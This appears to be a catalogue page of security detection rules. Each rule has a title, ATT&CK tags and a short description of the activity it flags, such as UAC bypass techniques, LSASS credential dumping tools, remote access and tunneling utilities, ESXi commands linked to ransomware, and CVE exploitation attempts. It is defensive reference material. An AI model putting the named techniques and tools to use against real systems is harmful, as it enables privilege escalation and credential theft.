Read More
Uncommon AppX Package Locations

Dec 27, 2024 · attack.defense-evasion ·
Share on:

Detects an appx package added the pipeline of the "to be processed" packages which is located in uncommon locations

Read More
Suspicious Windows Service Tampering

Dec 27, 2024 · attack.defense-evasion attack.t1489 attack.t1562.001 ·
Share on:

Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts

Read More
DNS Query To Remote Access Software Domain From Non-Browser App

Dec 19, 2024 · attack.command-and-control attack.t1219 ·
Share on:

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Read More
New AWS Lambda Function URL Configuration Created

Dec 19, 2024 · attack.initial-access attack.privilege-escalation ·
Share on:

Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls. This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function.

Read More
AWS SAML Provider Deletion Activity

Dec 19, 2024 · attack.t1078.004 attack.privilege-escalation attack.t1531 ·
Share on:

Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access. An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.

Read More
Register new Logon Process by Rubeus

Dec 19, 2024 · attack.lateral-movement attack.privilege-escalation attack.credential-access attack.t1558.003 ·
Share on:

Detects potential use of Rubeus via registered new trusted logon process

Read More
AWS Key Pair Import Activity

Dec 19, 2024 · attack.initial-access attack.t1078 attack.persistence attack.privilege-escalation ·
Share on:

Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.

Read More
DNS Query Request By QuickAssist.EXE

Dec 19, 2024 · attack.initial-access attack.t1071.001 attack.t1210 ·
Share on:

Detects DNS queries initiated by "QuickAssist.exe" to Microsoft Quick Assist primary endpoint that is used to establish a session.

Read More
QuickAssist Execution

Dec 19, 2024 · attack.command-and-control attack.t1219 ·
Share on:

Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.

Read More
Webshell Detection With Command Line Keywords

Dec 14, 2024 · attack.persistence attack.t1505.003 attack.t1018 attack.t1033 attack.t1087 ·
Share on:

Detects certain command line parameters often used during reconnaissance activity via web shells

Read More
Potential Secure Deletion with SDelete

Dec 14, 2024 · attack.impact attack.defense-evasion attack.t1070.004 attack.t1027.005 attack.t1485 attack.t1553.002 attack.s0195 ·
Share on:

Detects files that have extensions commonly seen while SDelete is used to wipe files.

Read More
COM Object Hijacking Via Modification Of Default System CLSID Default Value

Dec 14, 2024 · attack.persistence attack.t1546.015 ·
Share on:

Detects potential COM object hijacking via modification of default system CLSID.

Read More
Local System Accounts Discovery - Linux

Dec 14, 2024 · attack.discovery attack.t1087.001 ·
Share on:

Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

Read More
Remote Access Tool Services Have Been Installed - Security

Dec 7, 2024 · attack.persistence attack.t1543.003 attack.t1569.002 ·
Share on:

Detects service installation of different remote access tools software. These software are often abused by threat actors to perform

Read More
Modification or Deletion of an AWS RDS Cluster

Dec 6, 2024 · attack.exfiltration attack.t1020 ·
Share on:

Detects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information.

Read More
NetNTLM Downgrade Attack - Registry

Dec 3, 2024 · attack.defense-evasion attack.t1562.001 attack.t1112 ·
Share on:

Detects NetNTLM downgrade attack

Read More
Potential Defense Evasion Via Rename Of Highly Relevant Binaries

Dec 3, 2024 · attack.defense-evasion attack.t1036.003 car.2013-05-009 ·
Share on:

Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.

Read More
Always Install Elevated Windows Installer

Dec 1, 2024 · attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege

Read More
CMSTP UAC Bypass via COM Object Access

Dec 1, 2024 · attack.execution attack.defense-evasion attack.privilege-escalation attack.t1548.002 attack.t1218.003 attack.g0069 car.2019-04-001 ·
Share on:

Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)

Read More
Exploiting CVE-2019-1388

Dec 1, 2024 · attack.privilege-escalation attack.t1068 cve.2019-1388 detection.emerging-threats ·
Share on:

Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM

Read More
Msiexec Quiet Installation

Dec 1, 2024 · attack.defense-evasion attack.t1218.007 ·
Share on:

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)

Read More
Non-privileged Usage of Reg or Powershell

Dec 1, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry

Read More
Permission Check Via Accesschk.EXE

Dec 1, 2024 · attack.discovery attack.t1069.001 ·
Share on:

Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges

Read More
Possible Privilege Escalation via Weak Service Permissions

Dec 1, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1574.011 ·
Share on:

Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand

Read More
Potential CVE-2021-41379 Exploitation Attempt

Dec 1, 2024 · attack.privilege-escalation attack.t1068 cve.2021-41379 detection.emerging-threats ·
Share on:

Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights

Read More
Potential Privilege Escalation via Service Permissions Weakness

Dec 1, 2024 · attack.privilege-escalation attack.t1574.011 ·
Share on:

Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level

Read More
Potential RDP Session Hijacking Activity

Dec 1, 2024 · attack.execution ·
Share on:

Detects potential RDP Session Hijacking activity on Windows systems

Read More
Potential UAC Bypass Via Sdclt.EXE

Dec 1, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1548.002 ·
Share on:

A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.

Read More
Suspicious Child Process Created as System

Dec 1, 2024 · attack.privilege-escalation attack.t1134.002 ·
Share on:

Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts

Read More
Suspicious High IntegrityLevel Conhost Legacy Option

Dec 1, 2024 · attack.defense-evasion attack.t1202 ·
Share on:

ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.

Read More
Suspicious Process By Web Server Process

Dec 1, 2024 · attack.persistence attack.t1505.003 attack.t1190 ·
Share on:

Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation

Read More
Suspicious RazerInstaller Explorer Subprocess

Dec 1, 2024 · attack.privilege-escalation attack.t1553 detection.emerging-threats ·
Share on:

Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM

Read More
Suspicious Scheduled Task Creation via Masqueraded XML File

Dec 1, 2024 · attack.defense-evasion attack.persistence attack.t1036.005 attack.t1053.005 ·
Share on:

Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence

Read More
Suspicious SYSTEM User Process Creation

Dec 1, 2024 · attack.credential-access attack.defense-evasion attack.privilege-escalation attack.t1134 attack.t1003 attack.t1027 ·
Share on:

Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)

Read More
UAC Bypass Abusing Winsat Path Parsing - Process

Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

Read More
UAC Bypass Tools Using ComputerDefaults

Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)

Read More
UAC Bypass Using ChangePK and SLUI

Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)

Read More
UAC Bypass Using Consent and Comctl32 - Process

Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

Read More
UAC Bypass Using Disk Cleanup

Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)

Read More
UAC Bypass Using DismHost

Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)

Read More
UAC Bypass Using IDiagnostic Profile

Dec 1, 2024 · attack.execution attack.defense-evasion attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects the "IDiagnosticProfileUAC" UAC bypass technique

Read More
UAC Bypass Using IEInstal - Process

Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

Read More
UAC Bypass Using MSConfig Token Modification - Process

Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

Read More
UAC Bypass Using NTFS Reparse Point - Process

Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

Read More
UAC Bypass Using PkgMgr and DISM

Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)

Read More
UAC Bypass Using Windows Media Player - Process

Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

Read More
UAC Bypass WSReset

Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config

Read More
Setup16.EXE Execution With Custom .Lst File

Dec 1, 2024 · attack.defense-evasion attack.t1574.005 ·
Share on:

Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file. These ".lst" file can contain references to external program that "Setup16.EXE" will execute. Attackers and adversaries might leverage this as a living of the land utility.

Read More
Suspicious ShellExec_RunDLL Call Via Ordinal

Dec 1, 2024 · attack.defense-evasion attack.t1218.011 ·
Share on:

Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands. Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.

Read More
Suspicious Usage Of ShellExec_RunDLL

Dec 1, 2024 · attack.defense-evasion ·
Share on:

Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack

Read More
Password Policy Discovery - Linux

Dec 1, 2024 · attack.discovery attack.t1201 ·
Share on:

Detects password policy discovery commands

Read More
File and Directory Discovery - Linux

Dec 1, 2024 · attack.discovery attack.t1083 ·
Share on:

Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.

Read More
System Owner or User Discovery - Linux

Dec 1, 2024 · attack.discovery attack.t1033 ·
Share on:

Detects the execution of host or user discovery utilities such as "whoami", "hostname", "id", etc. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Read More
All Rules Have Been Deleted From The Windows Firewall Configuration

Dec 1, 2024 · attack.defense-evasion attack.t1562.004 ·
Share on:

Detects when a all the rules have been deleted from the Windows Defender Firewall configuration

Read More
CodePage Modification Via MODE.COM To Russian Language

Dec 1, 2024 · attack.defense-evasion attack.t1036 ·
Share on:

Detects a CodePage modification using the "mode.com" utility to Russian language. This behavior has been used by threat actors behind Dharma ransomware.

Read More
CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process

Dec 1, 2024 · detection.emerging-threats attack.execution attack.t1203 cve.2023-38331 ·
Share on:

Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.

Read More
GCP Access Policy Deleted

Dec 1, 2024 · attack.persistence attack.privilege-escalation attack.t1098 ·
Share on:

Detects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource.

Read More
GCP Break-glass Container Workload Deployed

Dec 1, 2024 · attack.defense-evasion attack.t1548 ·
Share on:

Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.

Read More
Google Workspace Application Access Level Modified

Dec 1, 2024 · attack.persistence attack.privilege-escalation attack.t1098.003 ·
Share on:

Detects when an access level is changed for a Google workspace application. An access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google workspace resources.

Read More
HackTool - EDRSilencer Execution - Filter Added

Dec 1, 2024 · attack.defense-evasion attack.t1562 ·
Share on:

Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.

Read More
HackTool - SharpMove Tool Execution

Dec 1, 2024 · attack.lateral-movement attack.t1021.002 ·
Share on:

Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.

Read More
HackTool - SOAPHound Execution

Dec 1, 2024 · attack.discovery attack.t1087 ·
Share on:

Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.

Read More
Peach Sandstorm APT Process Activity Indicators

Dec 1, 2024 · attack.execution detection.emerging-threats ·
Share on:

Detects process creation activity related to Peach Sandstorm APT

Read More
Potential Dropper Script Execution Via WScript/CScript

Dec 1, 2024 · attack.execution attack.t1059.005 attack.t1059.007 ·
Share on:

Detects wscript/cscript executions of scripts located in user directories

Read More
Potential Peach Sandstorm APT C2 Communication Activity

Dec 1, 2024 · attack.command-and-control detection.emerging-threats ·
Share on:

Detects potential C2 communication activity related to Peach Sandstorm APT

Read More
Potential Persistence Via MyComputer Registry Keys

Dec 1, 2024 · attack.persistence ·
Share on:

Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)

Read More
Potential Pikabot C2 Activity

Dec 1, 2024 · attack.command-and-control attack.t1573 detection.emerging-threats ·
Share on:

Detects the execution of rundll32 that leads to an external network connection. The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.

Read More
Potential Pikabot Discovery Activity

Dec 1, 2024 · attack.discovery attack.t1016 attack.t1049 attack.t1087 detection.emerging-threats ·
Share on:

Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups. The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).

Read More
Potential Pikabot Hollowing Activity

Dec 1, 2024 · attack.defense-evasion attack.t1055.012 detection.emerging-threats ·
Share on:

Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries

Read More
Potentially Suspicious Self Extraction Directive File Created

Dec 1, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stand for Self Extraction Directive files. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. Usually ".sed" files are simple ini files and not PE binaries.

Read More
PowerShell Core DLL Loaded By Non PowerShell Process

Dec 1, 2024 · attack.t1059.001 attack.execution ·
Share on:

Detects loading of essential DLLs used by PowerShell by non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension.

Read More
PUA - PingCastle Execution

Dec 1, 2024 · attack.reconnaissance attack.t1595 ·
Share on:

Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.

Read More
PUA - PingCastle Execution From Potentially Suspicious Parent

Dec 1, 2024 · attack.reconnaissance attack.t1595 ·
Share on:

Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.

Read More
Remote CHM File Download/Execution Via HH.EXE

Dec 1, 2024 · attack.defense-evasion attack.t1218.001 ·
Share on:

Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files.

Read More
Remote Thread Creation In Mstsc.Exe From Suspicious Location

Dec 1, 2024 · attack.credential-access ·
Share on:

Detects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location. This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials.

Read More
Renamed PingCastle Binary Execution

Dec 1, 2024 · attack.execution attack.t1059 attack.defense-evasion attack.t1202 ·
Share on:

Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.

Read More
Self Extraction Directive File Created In Potentially Suspicious Location

Dec 1, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.

Read More
Suspicious Processes Spawned by Java.EXE

Dec 1, 2024 · attack.initial-access attack.persistence attack.privilege-escalation ·
Share on:

Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)

Read More
System Control Panel Item Loaded From Uncommon Location

Dec 1, 2024 · attack.defense-evasion attack.t1036 ·
Share on:

Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.

Read More
System Disk And Volume Reconnaissance Via Wmic.EXE

Dec 1, 2024 · attack.execution attack.discovery attack.t1047 attack.t1082 ·
Share on:

An adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the wmic command-line utility and has been observed being used by threat actors such as Volt Typhoon.

Read More
Uncommon Connection to Active Directory Web Services

Dec 1, 2024 · attack.discovery attack.t1087 ·
Share on:

Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.

Read More
Windows Filtering Platform Blocked Connection From EDR Agent Binary

Dec 1, 2024 · attack.defense-evasion attack.t1562 ·
Share on:

Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents. Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.

Read More
Creation of WerFault.exe/Wer.dll in Unusual Folder

Nov 29, 2024 · attack.persistence attack.defense-evasion attack.t1574.001 ·
Share on:

Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.

Read More
GALLIUM IOCs

Nov 25, 2024 · attack.credential-access attack.command-and-control attack.t1212 attack.t1071 attack.g0093 detection.emerging-threats ·
Share on:

Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.

Read More
HackTool - CoercedPotato Execution

Nov 25, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 ·
Share on:

Detects the use of CoercedPotato, a tool for privilege escalation

Read More
HackTool - CreateMiniDump Execution

Nov 25, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine

Read More
HackTool - GMER Rootkit Detector and Remover Execution

Nov 25, 2024 · attack.defense-evasion ·
Share on:

Detects the execution GMER tool based on image and hash fields.

Read More
HackTool - HandleKatz LSASS Dumper Execution

Nov 25, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same

Read More
HackTool - Impersonate Execution

Nov 25, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1134.001 attack.t1134.003 ·
Share on:

Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively

Read More
HackTool - LocalPotato Execution

Nov 25, 2024 · attack.defense-evasion attack.privilege-escalation cve.2023-21746 ·
Share on:

Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples

Read More
HackTool - PCHunter Execution

Nov 25, 2024 · attack.execution attack.discovery attack.t1082 attack.t1057 attack.t1012 attack.t1083 attack.t1007 ·
Share on:

Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff

Read More
HackTool - PPID Spoofing SelectMyParent Tool Execution

Nov 25, 2024 · attack.defense-evasion attack.t1134.004 ·
Share on:

Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent

Read More
HackTool - SharpEvtMute DLL Load

Nov 25, 2024 · attack.defense-evasion attack.t1562.002 ·
Share on:

Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs

Read More
HackTool - Stracciatella Execution

Nov 25, 2024 · attack.execution attack.defense-evasion attack.t1059 attack.t1562.001 ·
Share on:

Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.

Read More
HackTool - SysmonEOP Execution

Nov 25, 2024 · cve.2022-41120 attack.t1068 attack.privilege-escalation ·
Share on:

Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120

Read More
HackTool - UACMe Akagi Execution

Nov 25, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata

Read More
HackTool - Windows Credential Editor (WCE) Execution

Nov 25, 2024 · attack.credential-access attack.t1003.001 attack.s0005 ·
Share on:

Detects the use of Windows Credential Editor (WCE)

Read More
Hacktool Execution - Imphash

Nov 25, 2024 · attack.credential-access attack.t1588.002 attack.t1003 ·
Share on:

Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed

Read More
HackTool Named File Stream Created

Nov 25, 2024 · attack.defense-evasion attack.s0139 attack.t1564.004 ·
Share on:

Detects the creation of a named file stream with the imphash of a well-known hack tool

Read More
Malicious DLL Load By Compromised 3CXDesktopApp

Nov 25, 2024 · attack.defense-evasion detection.emerging-threats ·
Share on:

Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp

Read More
MpiExec Lolbin

Nov 25, 2024 · attack.execution attack.defense-evasion attack.t1218 ·
Share on:

Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary

Read More
Potential Compromised 3CXDesktopApp Execution

Nov 25, 2024 · attack.defense-evasion attack.t1218 attack.execution detection.emerging-threats ·
Share on:

Detects execution of known compromised version of 3CXDesktopApp

Read More
Potential SquiblyTwo Technique Execution

Nov 25, 2024 · attack.defense-evasion attack.t1047 attack.t1220 attack.execution attack.t1059.005 attack.t1059.007 ·
Share on:

Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields

Read More
PUA - Fast Reverse Proxy (FRP) Execution

Nov 25, 2024 · attack.command-and-control attack.t1090 ·
Share on:

Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.

Read More
PUA - Nimgrab Execution

Nov 25, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.

Read More
PUA - NPS Tunneling Tool Execution

Nov 25, 2024 · attack.command-and-control attack.t1090 ·
Share on:

Detects the use of NPS, a port forwarding and intranet penetration proxy server

Read More
PUA - Process Hacker Driver Load

Nov 25, 2024 · attack.privilege-escalation cve.2021-21551 attack.t1543 ·
Share on:

Detects driver load of the Process Hacker tool

Read More
PUA - Process Hacker Execution

Nov 25, 2024 · attack.defense-evasion attack.discovery attack.persistence attack.privilege-escalation attack.t1622 attack.t1564 attack.t1543 ·
Share on:

Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.

Read More
PUA - System Informer Driver Load

Nov 25, 2024 · attack.privilege-escalation attack.t1543 ·
Share on:

Detects driver load of the System Informer tool

Read More
PUA - System Informer Execution

Nov 25, 2024 · attack.persistence attack.privilege-escalation attack.discovery attack.defense-evasion attack.t1082 attack.t1564 attack.t1543 ·
Share on:

Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations

Read More
PUA- IOX Tunneling Tool Execution

Nov 25, 2024 · attack.command-and-control attack.t1090 ·
Share on:

Detects the use of IOX - a tool for port forwarding and intranet proxy purposes

Read More
Remote Access Tool - NetSupport Execution From Unusual Location

Nov 25, 2024 · attack.defense-evasion ·
Share on:

Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files')

Read More
Renamed AdFind Execution

Nov 25, 2024 · attack.discovery attack.t1018 attack.t1087.002 attack.t1482 attack.t1069.002 ·
Share on:

Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.

Read More
Renamed AutoIt Execution

Nov 25, 2024 · attack.defense-evasion attack.t1027 ·
Share on:

Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.

Read More
Renamed NetSupport RAT Execution

Nov 25, 2024 · attack.defense-evasion ·
Share on:

Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings

Read More
Renamed PAExec Execution

Nov 25, 2024 · attack.defense-evasion attack.t1202 ·
Share on:

Detects execution of renamed version of PAExec. Often used by attackers

Read More
Vulnerable HackSys Extreme Vulnerable Driver Load

Nov 25, 2024 · attack.privilege-escalation attack.t1543.003 ·
Share on:

Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors

Read More
Vulnerable WinRing0 Driver Load

Nov 25, 2024 · attack.privilege-escalation attack.t1543.003 ·
Share on:

Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation

Read More
WinDivert Driver Load

Nov 25, 2024 · attack.collection attack.defense-evasion attack.t1599.001 attack.t1557.001 ·
Share on:

Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows

Read More
ESXi Account Creation Via ESXCLI

Nov 20, 2024 · attack.persistence attack.t1136 ·
Share on:

Detects user account creation on ESXi system via esxcli

Read More
ESXi Admin Permission Assigned To Account Via ESXCLI

Nov 20, 2024 · attack.execution ·
Share on:

Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.

Read More
ESXi Network Configuration Discovery Via ESXCLI

Nov 20, 2024 · attack.discovery attack.t1033 attack.t1007 ·
Share on:

Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.

Read More
ESXi Storage Information Discovery Via ESXCLI

Nov 20, 2024 · attack.discovery attack.t1033 attack.t1007 ·
Share on:

Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.

Read More
ESXi Syslog Configuration Change Via ESXCLI

Nov 20, 2024 · attack.defense-evasion attack.t1562.001 attack.t1562.003 ·
Share on:

Detects changes to the ESXi syslog configuration via "esxcli"

Read More
ESXi System Information Discovery Via ESXCLI

Nov 20, 2024 · attack.discovery attack.t1033 attack.t1007 ·
Share on:

Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.

Read More
ESXi VM Kill Via ESXCLI

Nov 20, 2024 · attack.execution ·
Share on:

Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.

Read More
ESXi VM List Discovery Via ESXCLI

Nov 20, 2024 · attack.discovery attack.t1033 attack.t1007 ·
Share on:

Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.

Read More
ESXi VSAN Information Discovery Via ESXCLI

Nov 20, 2024 · attack.discovery attack.t1033 attack.t1007 ·
Share on:

Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.

Read More
App Assigned To Azure RBAC/Microsoft Entra Role

Nov 20, 2024 · attack.persistence attack.privilege-escalation attack.t1098.003 ·
Share on:

Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.

Read More
Potential File Extension Spoofing Using Right-to-Left Override

Nov 18, 2024 · attack.execution attack.defense-evasion attack.t1036.002 ·
Share on:

Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.

Read More
Potentially Suspicious Cabinet File Expansion

